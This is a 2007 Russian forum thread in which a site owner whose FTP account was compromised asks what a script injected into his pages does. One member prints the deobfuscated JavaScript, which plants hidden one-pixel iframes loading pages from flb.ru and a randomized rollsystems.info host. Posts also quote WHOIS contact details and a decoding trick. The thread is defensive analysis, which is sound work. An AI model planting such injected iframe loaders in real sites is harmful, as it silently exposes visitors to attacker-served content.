ReSQL.ru
     
powered by simpleCommunicator - 2.0.59     © 2025 Programmizd 02
Мобильная версия    Контакт    Правила    FAQ    Помощь
Целевая тема:
Создать новую тему:
Автор:
Закрыть
Цитировать
Доб. в избранное | Игнор. тему | Прикреп. тему | Пометить прочит. / непрочит. | Фильтр
Форумы / HTML, JavaScript, VBScript, CSS [игнор отключен] [закрыт для гостей] / Зловредный скрипт - ЧТО ОН МОГ ДЕЛАТЬ?
12 сообщений из 12, страница 1 из 1
Зловредный скрипт - ЧТО ОН МОГ ДЕЛАТЬ?
    #34465685
SQLWalker
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
SQLWalker
Гость
Пару дней назад некий хакер пока неизвестным мне способом получил пароль на мой
ftp и к тексту некоторых страниц добавил некий скрипт. При открытии страницы у меня выскакивала ошибка "Приложение C:\Windows\oft.exe не является Win32 приложением".
В каталоге C:\Windows я обнаруживал пустой файл со случайным именем и расширением exe.
Кроме этого скрипт что-то отсылал например на узел flb.ru

Кто может по этому скрипту сказать о его действиях?
...
Рейтинг: 0 / 0
17.04.2007, 11:17
| Ответить | Цитировать | Написать  
Зловредный скрипт - ЧТО ОН МОГ ДЕЛАТЬ?
    #34465700
SQLWalker
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
SQLWalker
Гость
Я скрипт прикрепил, а его нет. Пробую еще раз
...
Рейтинг: 0 / 0
17.04.2007, 11:19
| Ответить | Цитировать | Написать  
Зловредный скрипт - ЧТО ОН МОГ ДЕЛАТЬ?
    #34465880
Фотография Antonariy
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Antonariy
Участник
Если снять обфускацию, то брюки превращаются...
<script language="javascript">
setTimeout(wfsw, 100);
setTimeout(wfsw, 1000);
setTimeout(wfsw, 2000);
setTimeout(wfsw, 3000);
setTimeout(wfsw, 4000);
setTimeout(wfsw, 5000);
setTimeout(function(){wfsw(true);}, 300);
setTimeout(function(){wfsw(true);}, 1200);
setTimeout(function(){wfsw(true);}, 2400);
setTimeout(function(){wfsw(true);}, 3600);
setTimeout(function(){wfsw(true);}, 4600);
setTimeout(function(){wfsw(true);}, 6000);
function wfsw(w){
var url,o;
url="http://" + (w ? "www." : "") + "flb.ru/info/"+Math.ceil(20000+Math.random()*22000)+".html";
o = document.createElement("iframe");
try { o.src=url;}
catch(e){o.setAttribute("src",url);}
o.style.display = "none";
o.style.width = "1px";
o.style.height = "1px";
o.frameBorder=0;
try { document.body.appendChild(o); }
catch(e){}
}

var cn = "sr0lfc";
var cv = "1";
var se = "s1.rollsystems.info";
var p = "/html/";

if(document.cookie.indexOf(cn+"="+cv) == -1){
var url = "http://" + (document.location.host != "" ? "" : rsys_rs()) + document.location.host.replace(/[^a-z0-9.-]/, ".").replace(/\.+/, ".") + "." + rsys_rs() + "." + se + p;
var o = document.createElement("iframe");
o.setAttribute("src", url);
o.frameBorder=1;
o.width=1;
o.height=1;
o.style.display="none";
try { document.body.appendChild(o); rsys_sc(cn,cv);}
catch(e){}
}
function rsys_rs(){
var l=48, c="01234567890abcdef", o="";
for(i=0; i < l; i++) o += c.substr(Math.floor(Math.random()*c.length),1,1);
return o;
}

function rsys_sc(cn,cv){
var t= new Date();
var e= new Date();
e.setTime(t.getTime()+3600000*24);
document.cookie = cn+"="+escape(cv)+";
expires="+e.toGMTString();
}
</script>Дальше думать лень...
...
Рейтинг: 0 / 0
17.04.2007, 11:54
| Ответить | Цитировать | Написать  
Зловредный скрипт - ЧТО ОН МОГ ДЕЛАТЬ?
    #34465925
Фотография Antonariy
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Antonariy
Участник
По-моему это банальная раскрутка сайта флб.ру
...
Рейтинг: 0 / 0
17.04.2007, 12:05
| Ответить | Цитировать | Написать  
Зловредный скрипт - ЧТО ОН МОГ ДЕЛАТЬ?
    #34465966
Фотография Antonariy
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Antonariy
Участник
Советую обратить внимание на сайт s1.rollsystems.info - яндекс первой же ссылкой выдал вот это .

ip этого сайта - 83.136.26.157, whois выдал такую инфу:

Код: plaintext
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.
25.
26.
27.
28.
29.
30.
31.
32.
33.
34.
35.
36.
37.
38.
39.
40.
41.
42.
inetnum:   83.136.26.0 - 83.136.26.255 
netname:   MTU-INFORM-NETWORK 
descr:    MTU-Inform company 
country:   RU 
admin-c:   MIKE7-RIPE 
admin-c:   DIMA1-RIPE 
tech-c:    MIKE7-RIPE 
tech-c:    DIMA1-RIPE 
status:    ASSIGNED PA 
mnt-by:    MTU-INFORM-MNT 
mnt-lower:  MTU-INFORM-MNT 
mnt-routes:  MTU-INFORM-MNT 
source:    RIPE # Filtered 

person:     Mikhail K Grachikov 
address:    MTU-Inform 
address:    Smolenskaya-Sennaya Sq., 27, bld. 2 
address:    119121, Moscow, 
remarks:    phone:    +7 095 2587886 
phone:     +7 495 2587886 
remarks:    ------------------------------------------------ 
remarks:    Please send abuse reports to  
remarks:    ------------------------------------------------ 
e-mail:      
nic-hdl:    MIKE7-RIPE 
mnt-by:     MTU-INFORM-MNT 
source:     RIPE # Filtered 
remarks:    modified for Russian phone area changes 

person:     Dmitri A Kravtsov 
address:    MTU-Inform 
address:    Smolenskaya-Sennaya Sq., 27, bld. 2 
address:    119121, Moscow, 
remarks:    phone:    +7 095 7213475 
phone:     +7 495 7213475 
e-mail:      
remarks:    ------------------------------------------------ 
remarks:    Please send abuse reports to  
remarks:    ------------------------------------------------ 
nic-hdl:    DIMA1-RIPE 
mnt-by:     MTU-INFORM-MNT 
source:     RIPE # Filtered 
remarks:    modified for Russian phone area changes
Можно обратиться к указанным товарищам...
...
Рейтинг: 0 / 0
17.04.2007, 12:12
| Ответить | Цитировать | Написать  
Зловредный скрипт - ЧТО ОН МОГ ДЕЛАТЬ?
    #34465983
SQLWalker
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
SQLWalker
Гость
AntonariyЕсли снять обфускацию...

Это уже кое-что. Спасибо. А как Вы сняли обфускацию ?
...
Рейтинг: 0 / 0
17.04.2007, 12:15
| Ответить | Цитировать | Написать  
Зловредный скрипт - ЧТО ОН МОГ ДЕЛАТЬ?
    #34465997
Фотография Antonariy
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Antonariy
Участник
Вместо document.write(FZ); написал
Код: plaintext
1.
2.
3.
	var fso=new ActiveXObject("Scripting.FilesystemObject");
	var ts = fso.OpenTextFile("out.txt", 2 ,true);
	ts.write(FZ);
	ts.close();
и выполнил скрипт. Он содержит функцию расшифровки массива.
...
Рейтинг: 0 / 0
17.04.2007, 12:18
| Ответить | Цитировать | Написать  
Зловредный скрипт - ЧТО ОН МОГ ДЕЛАТЬ?
    #34466015
SQLWalker
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
SQLWalker
Гость
AntonariyСоветую обратить внимание на сайт s1.rollsystems.info - яндекс первой же ссылкой выдал вот это .

ip этого сайта - 83.136.26.157, whois выдал такую инфу:
Можно обратиться к указанным товарищам...

Про ip адрес мне еще вчера сказал хостинг-провайдер - именно с этого адреса зашли по ftp и добавили скрипт. Но как они слили мои ftp пароли, пока не могу понять. Установлены и постоянно апдейтятся Outpost & NOD32.

Спасибо за инфу по rollsystems.info/html. Вот гады.
...
Рейтинг: 0 / 0
17.04.2007, 12:21
| Ответить | Цитировать | Написать  
Зловредный скрипт - ЧТО ОН МОГ ДЕЛАТЬ?
    #34478159
Фотография Ferrari8246
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Ferrari8246
Участник
пароли елементарно.
програмамми или шпионами.
чем угодно и как угодно.
...
Рейтинг: 0 / 0
21.04.2007, 18:45
| Ответить | Цитировать | Написать  
Зловредный скрипт - ЧТО ОН МОГ ДЕЛАТЬ?
    #34478266
WEB_bobby
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
WEB_bobby
Участник
Зы так а вы не в курсе? В сети новый вирь!
Просвещаемся: >>>>
...
Рейтинг: 0 / 0
21.04.2007, 21:06
| Ответить | Цитировать | Написать  
Зловредный скрипт - ЧТО ОН МОГ ДЕЛАТЬ?
    #34484172
John12
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
John12
Гость
Антивирус касперского его дерет, просто установи себе на комп с базами апдейта на 19 апреля 07
и версия AVP 4,5 =)
Удачи
...
Рейтинг: 0 / 0
24.04.2007, 16:53
| Ответить | Цитировать | Написать  
Зловредный скрипт - ЧТО ОН МОГ ДЕЛАТЬ?
    #34484195
John12
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
John12
Гость
Привет ребят!!!
Ребята мне надо скрипт (VBS) или JS.
Надо чтобы с фтп мона было закачивать с UpLoadom списки файлов и проверять
дату их изменения, но причем чтобы скрипт не пользовался файлом ftp.exe а под виндой XP выполнял стандартные комнды скриптов.
Если это мона сделать через библиотеку (WinInet) то напишите пример как ато чет у меня
не получается ее подключить +)
Пожалуйсто хелпните меня =)
Репка вам++
...
Рейтинг: 0 / 0
24.04.2007, 16:58
| Ответить | Цитировать | Написать  
12 сообщений из 12, страница 1 из 1
Форумы / HTML, JavaScript, VBScript, CSS [игнор отключен] [закрыт для гостей] / Зловредный скрипт - ЧТО ОН МОГ ДЕЛАТЬ?
Найденые пользователи ...
Разблокировать пользователей ...
Читали тему (0):
Читали форум (0):
Пользователи онлайн (0):
Польз. соглашение
NoSQL.ru       Новости, Чат       Фотоальбом: Участники, Встречи
Закрыть
start [/forum/topic.php?fid=22&tid=1458408]:
 0ms
get settings:
 10ms
get forum list:
 13ms
check forum access:
 3ms
check topic access:
 3ms
track hit:
 46ms
get topic data:
 9ms
get forum data:
 2ms
get page messages:
 40ms
get tp. blocked users:
 1ms
others: 13ms
total:  140ms
созд. / загр.: 140ms
x
x
Закрыть


Просмотр
0 / 0
Close
Debug Console [Select Text]